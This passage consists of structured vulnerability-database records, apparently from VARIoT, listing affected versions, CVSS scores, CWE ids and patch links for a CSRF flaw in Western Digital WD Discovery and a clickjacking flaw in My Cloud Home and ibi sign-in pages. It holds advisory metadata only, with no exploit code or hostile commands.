"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2021-25951"
}
],
"trust": 1.6
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"IoT"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2021-25951"
}
]
},
"last_update_date": "2023-12-18T13:12:58.947000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "SOFTWARE \u0026 DOWNLOADS",
"trust": 0.8,
"url": "https://support.wdc.com/downloads.aspx?g=907\u0026lang=en"
},
{
"title": "WDC-20004",
"trust": 0.8,
"url": "https://www.westerndigital.com/support/productsecurity/wdc-20004-wd-discovery-cross-site-request-forgery-csrf"
},
{
"title": "Western Digital Western Digital WD Discovery cross-site request forgery vulnerability patch",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchinfo/show/256756"
},
{
"title": "Western Digital MyCloud Home Western Digital WD Discovery Fixes for cross-site request forgery vulnerabilities",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=118942"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2021-25951"
},
{
"db": "JVNDB",
"id": "JVNDB-2020-005409"
},
{
"db": "CNNVD",
"id": "CNNVD-202005-716"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-352",
"trust": 1.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2020-005409"
},
{
"db": "NVD",
"id": "CVE-2020-12427"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.0,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-12427"
},
{
"trust": 1.7,
"url": "https://support.wdc.com/downloads.aspx?g=907\u0026lang=en"
},
{
"trust": 1.7,
"url": "https://www.westerndigital.com/support/productsecurity/wdc-20004-wd-discovery-cross-site-request-forgery-csrf"
},
{
"trust": 0.8,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2020-12427"
},
{
"trust": 0.8,
"url": "https://payatu.com/blog/munawwar/trendnet-wireless-camera-buffer-overflow-vulnerability"
},
{
"trust": 0.1,
"url": "https://cwe.mitre.org/data/definitions/352.html"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2021-25951"
},
{
"db": "VULMON",
"id": "CVE-2020-12427"
},
{
"db": "JVNDB",
"id": "JVNDB-2020-005409"
},
{
"db": "NVD",
"id": "CVE-2020-12427"
},
{
"db": "CNNVD",
"id": "CNNVD-202005-716"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CNVD",
"id": "CNVD-2021-25951"
},
{
"db": "VULMON",
"id": "CVE-2020-12427"
},
{
"db": "JVNDB",
"id": "JVNDB-2020-005409"
},
{
"db": "NVD",
"id": "CVE-2020-12427"
},
{
"db": "CNNVD",
"id": "CNNVD-202005-716"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2021-04-08T00:00:00",
"db": "CNVD",
"id": "CNVD-2021-25951"
},
{
"date": "2020-05-13T00:00:00",
"db": "VULMON",
"id": "CVE-2020-12427"
},
{
"date": "2020-06-12T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2020-005409"
},
{
"date": "2020-05-13T15:15:11.527000",
"db": "NVD",
"id": "CVE-2020-12427"
},
{
"date": "2020-05-13T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202005-716"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2021-04-08T00:00:00",
"db": "CNVD",
"id": "CNVD-2021-25951"
},
{
"date": "2020-05-15T00:00:00",
"db": "VULMON",
"id": "CVE-2020-12427"
},
{
"date": "2020-06-12T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2020-005409"
},
{
"date": "2021-09-08T17:22:44.410000",
"db": "NVD",
"id": "CVE-2020-12427"
},
{
"date": "2020-05-22T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202005-716"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202005-716"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "MyCloud Home for Western Digital WD Discovery Cross-site request forgery vulnerability in application",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2020-005409"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "cross-site request forgery",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202005-716"
}
],
"trust": 0.6
}
}
VAR-202004-0205
Vulnerability from variot - Updated: 2023-12-18 13:01Western Digital My Cloud Home and ibi devices before 2.2.0 allow clickjacking on sign-in pages. Western Digital My Cloud is a personal cloud storage device of Western Digital (Western Digital). Attackers can use this vulnerability to hijack click operations on the login page
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-202004-0205",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "ibi",
"scope": "lt",
"trust": 1.0,
"vendor": "westerndigital",
"version": "2.2.0"
},
{
"model": "my cloud home",
"scope": "lt",
"trust": 1.0,
"vendor": "westerndigital",
"version": "2.2.0"
},
{
"model": "ibi",
"scope": "eq",
"trust": 0.8,
"vendor": "western digital",
"version": "2.2.0"
},
{
"model": "my cloud home",
"scope": "eq",
"trust": 0.8,
"vendor": "western digital",
"version": "2.2.0"
},
{
"model": "digital my cloud home",
"scope": "lt",
"trust": 0.6,
"vendor": "western",
"version": "2.2.0"
},
{
"model": "digital ibi websites",
"scope": "lt",
"trust": 0.6,
"vendor": "western",
"version": "2.2.0"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2020-33079"
},
{
"db": "JVNDB",
"id": "JVNDB-2020-004522"
},
{
"db": "NVD",
"id": "CVE-2020-10951"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:a:westerndigital:ibi:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2.2.0",
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:westerndigital:my_cloud_home:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2.2.0",
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2020-10951"
}
]
},
"cve": "CVE-2020-10951",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "NVD",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"exploitabilityScore": 8.6,
"impactScore": 2.9,
"integrityImpact": "PARTIAL",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "MEDIUM",
"trust": 1.0,
"userInteractionRequired": true,
"vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Medium",
"accessVector": "Network",
"authentication": "None",
"author": "NVD",
"availabilityImpact": "None",
"baseScore": 4.3,
"confidentialityImpact": "None",
"exploitabilityScore": null,
"id": "JVNDB-2020-004522",
"impactScore": null,
"integrityImpact": "Partial",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "Medium",
"trust": 0.8,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
"version": "2.0"
},
{
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"exploitabilityScore": 8.6,
"id": "CNVD-2020-33079",
"impactScore": 2.9,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 0.6,
"vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "NVD",
"availabilityImpact": "NONE",
"baseScore": 4.7,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"exploitabilityScore": 2.8,
"impactScore": 1.4,
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "CHANGED",
"trust": 1.0,
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:N/I:L/A:N",
"version": "3.1"
},
{
"attackComplexity": "Low",
"attackVector": "Network",
"author": "NVD",
"availabilityImpact": "None",
"baseScore": 4.7,
"baseSeverity": "Medium",
"confidentialityImpact": "None",
"exploitabilityScore": null,
"id": "JVNDB-2020-004522",
"impactScore": null,
"integrityImpact": "Low",
"privilegesRequired": "None",
"scope": "Changed",
"trust": 0.8,
"userInteraction": "Required",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:N/I:L/A:N",
"version": "3.0"
}
],
"severity": [
{
"author": "NVD",
"id": "CVE-2020-10951",
"trust": 1.0,
"value": "MEDIUM"
},
{
"author": "NVD",
"id": "JVNDB-2020-004522",
"trust": 0.8,
"value": "Medium"
},
{
"author": "CNVD",
"id": "CNVD-2020-33079",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "CNNVD",
"id": "CNNVD-202004-1188",
"trust": 0.6,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2020-33079"
},
{
"db": "JVNDB",
"id": "JVNDB-2020-004522"
},
{
"db": "NVD",
"id": "CVE-2020-10951"
},
{
"db": "CNNVD",
"id": "CNNVD-202004-1188"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Western Digital My Cloud Home and ibi devices before 2.2.0 allow clickjacking on sign-in pages. Western Digital My Cloud is a personal cloud storage device of Western Digital (Western Digital). Attackers can use this vulnerability to hijack click operations on the login page",
"sources": [
{
"db": "NVD",
"id": "CVE-2020-10951"
},
{
"db": "JVNDB",
"id": "JVNDB-2020-004522"
},
{
"db": "CNVD",
"id": "CNVD-2020-33079"
}
],
"trust": 2.16
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2020-10951",
"trust": 3.0
},
{
"db": "JVNDB",
"id": "JVNDB-2020-004522",
"trust": 0.8
},
{
"db": "CNVD",
"id": "CNVD-2020-33079",
"trust": 0.6
},
{
"db": "CNNVD",
"id": "CNNVD-202004-1188",
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2020-33079"
},
{
"db": "JVNDB",
"id": "JVNDB-2020-004522"
},
{
"db": "NVD",
"id": "CVE-2020-10951"
},
{
"db": "CNNVD",
"id": "CNNVD-202004-1188"
}
]
},
"id": "VAR-202004-0205",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2020-33079"
}
],
"trust": 1.6
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"IoT"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2020-33079"
}
]
},
"last_update_date": "2023-12-18T13:01:48.156000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "SOFTWARE \u0026 DOWNLOADS",
"trust": 0.8,
"url": "https://support.wdc.com/downloads.aspx?g=907\u0026lang=en"
},
{
"title": "WDC-19012",
"trust": 0.8,
"url": "https://www.westerndigital.com/support/productsecurity/wdc-19012-my-cloud-home-and-ibi-portal-websites-clickjacking-vulnerability"
},
{
"title": "Patch for Western Digital My Cloud Home and ibi Websites clickjacking vulnerability",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchinfo/show/221717"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2020-33079"
},
{
"db": "JVNDB",
"id": "JVNDB-2020-004522"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-1021",
"trust": 1.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2020-004522"
},
{
"db": "NVD",
"id": "CVE-2020-10951"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.0,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-10951"
},
{
"trust": 1.6,
"url": "https://support.wdc.com/downloads.aspx?g=907\u0026lang=en"
},
{
"trust": 1.6,
"url": "https://www.westerndigital.com/support/productsecurity/wdc-19012-my-cloud-home-and-ibi-portal-websites-clickjacking-vulnerability"
},
{
"trust": 1.6,
"url": "https://www.westerndigital.com/support/productsecurity/wdc-19012-my-cloud-home-and-ibi-websites-2-2-0"
},
{
"trust": 0.8,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2020-10951"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2020-33079"
},
{
"db": "JVNDB",
"id": "JVNDB-2020-004522"
},
{
"db": "NVD",
"id": "CVE-2020-10951"
},
{
"db": "CNNVD",
"id": "CNNVD-202004-1188"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CNVD",
"id": "CNVD-2020-33079"
},
{
"db": "JVNDB",
"id": "JVNDB-2020-004522"
},
{
"db": "NVD",
"id": "CVE-2020-10951"
},
{
"db": "CNNVD",
"id": "CNNVD-202004-1188"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2020-06-15T00:00:00",
"db": "CNVD",
"id": "CNVD-2020-33079"
},
{
"date": "2020-05-19T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2020-004522"
},
{
"date": "2020-04-15T20:15:14.723000",
"db": "NVD",
"id": "CVE-2020-10951"
},
{
"date": "2020-04-15T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202004-1188"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2020-06-15T00:00:00",
"db": "CNVD",
"id": "CNVD-2020-33079"
},
{
"date": "2020-05-19T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2020-004522"
},
{
"date": "2023-03-01T03:06:17.070000",
"db": "NVD",
"id": "CVE-2020-10951"
},
{
"date": "2020-08-28T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202004-1188"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202004-1188"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Western Digital My Cloud Home and ibi Vulnerability regarding improper restrictions on rendered user interface layers or frames on devices",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2020-004522"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "other",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202004-1188"
}
],
"trust": 0.6
}
}